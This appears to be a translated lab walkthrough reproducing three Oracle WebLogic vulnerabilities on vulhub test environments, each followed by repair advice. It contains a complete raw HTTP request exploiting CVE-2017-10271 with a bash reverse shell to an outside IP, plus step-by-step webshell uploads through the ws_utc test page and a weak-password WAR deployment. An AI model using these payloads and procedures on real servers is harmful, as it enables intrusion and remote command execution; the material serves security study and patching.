1. Deserialization
2. Upload any file
3. Deploy war package in the background
1.Weblogic XMLDecoder deserialization vulnerability (CVE-2017-10271)
1.Vulnerability description
Weblogic’s WLS Security component provides webservice services to the outside world. XMLDecoder is used to parse the XML data passed in by the user. During the parsing process, a deserialization vulnerability occurs, allowing arbitrary commands to be executed.
2. The vulnerability involves versions
10.3.6.0.0
12.1.3.0.0
12.2.1.1.0
12.2.1.2.0
3.Environment setup
Use docker to pull the image in vulhub and start the environment
docker-compose up -d
Visit http://your-ip:7001/ and you will see a 404 page, indicating that weblogic has been successfully started.
The scan path found that you can access http://192.168.0.130:7001/wls-wsat/CoordinatorPortType and the following page appears, indicating that there is a vulnerability.
4. Reproduction process
(1)Use tools
Tool detects vulnerabilities
(2) No tools
Visit http://192.168.0.130:7001/wls-wsat/CoordinatorPortType
Use brupsuite to capture packets,
Change the get method to POST
Replace webshell with
Note that the statements that bounce back the shell need to be encoded, otherwise format errors will occur when parsing the XML.
And modify the corresponding value of Content-Type in the request header to text/xml
POST /wls-wsat/CoordinatorPortType HTTP/1.1 Host: 192.168.0.130:7001 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Type: text/xml Content-Length: 633 <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java version="1.4.0" class="java.beans.XMLDecoder"> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>bash -i & amp;gt; & amp;amp; /dev/tcp/192.168.0.119/4444 0 & amp;gt; & amp;amp;1</string> </void> </array> <void method="start"/></void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
The monitoring is successful and the connection is successful and the command can be executed.
Fix
1. Update Oracle corresponding patches
2. Create ACL access control rules on firewalls or routers and switches for resource access to wls-wsat.
3. Delete the corresponding war package without affecting the business.
2.weblogic arbitrary file upload vulnerability
Vulnerability description
Two unauthorized pages on the weblogic management side have arbitrary file upload getshell vulnerabilities, and webshell can be obtained directly
Affected versions
weblogic 10.3.6.0, weblogic 12.1.3.0, weblogic 12.2.1.2, weblogic 12.2.1.3.
1. Startup environment
docker-compose up -d
2. Recurrence of vulnerabilities
Execute the following command to view the administrator password. The administrator username is weblogic and the password is pIeaMV7G.
docker-compose logs | grep password
Use the above account and password to log in to weblogic
http://192.168.150.146:7001/console/login/LoginForm.jsp
Log in to the background page, click on the configuration of base_domain, check the ‘Enable Web Service Test Page’ option in ‘Advanced’, and then save the configuration.
Visit http://192.168.150.146:7001/ws_utc/config.do and set the Work Home Dir to /u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws -testclient-app-wls/4mcj4y/war/css
Then click Security’ -> Add’ and then upload jsp Malaysia
Record the timestamp in the package
Connect to http://your-ip:7001/ws_utc/css/config/keystore/[timestamp]_[file name] to execute webshell
http://192.168.0.130:7001/ws_utc/css/config/keystore/1697639529121_ma1.jsp
Passwordadmin
success
Repair suggestions:
(1) Set up config.do, begin.do page login authorization before accessing
(2) Update product version and install security patches
3.weblogicBackground deployment war package
1. Principle of vulnerability
After setting up the weblogic service, the default password in the background was not modified or the password setting was too simple, which resulted in the user being able to log in with a weak password and eventually gain server permissions.
2.Affected version
Weblogic version: 10.3.6
Java version: 1.6
3.Environment setup
Use docker to pull the image in vulhub and start the environment
docker-compose up -d
Visit http://your-ip:7001/ and you will see a 404 page, indicating that weblogic has been successfully started.
Enter the background http://192.168.0.116:7001/console/login/LoginForm.jsp
There is a weak password in this environment: weblogic/Oracle@123
Select Deployment on the left and click Install
Then you can see that there is an option to upload files. Here you can upload a jsp type pony war package to get the shell.
Create a new folder with only ma1.jsp file in it and enter the command:
jar -cvf test.war .
test.war is the name of the file generated after packaging.
The latter. is to package all files in the current directory.
Upload the war package we made and keep clicking Next
Click Save, it will prompt that the change is successful, and then you can connect to our launch.
The connection is successful, here test is the name of our war package, and shell.jsp is the pony inside.
Passwordadmin
4. Defense and Repair
1. Set up the Config.do page to log in and authorize access;
2. IPS and other defense products can add corresponding features;
3. Upgrade to the latest official version
The knowledge points of the article match the official knowledge files, and you can further learn related knowledge. Java Skill TreeHomepageOverview 138033 people are learning the system